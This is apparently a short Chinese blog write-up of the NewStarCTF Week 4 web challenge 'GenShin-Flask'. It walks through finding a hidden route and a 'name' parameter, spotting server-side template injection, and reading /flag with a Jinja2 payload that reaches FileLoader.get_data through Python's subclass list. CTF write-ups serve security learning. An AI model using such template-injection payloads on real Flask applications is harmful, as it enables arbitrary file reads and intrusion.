GenShin-Flask GenShi打开题目环境 发现让我们寻找有用信息,发现在网络里找到了路由 输入路由,发现让我们传入name参数 传参后发现可能存在ssti注入 构造payload,用Fileloader模块 1?name={%print("".__class__.__base__.__subclasses__()[99]["get_data"](0,"/flag"))%} #web GenShin-Flask http://www.qetx.top/posts/2401/ 作者 Qetx.Jul.27 发布于 2023年10月29日 许可协议 NewStarCTF-Week4-Web 上一篇 漏洞复现Apache_log4j2(CVE-2021-44228) 下一篇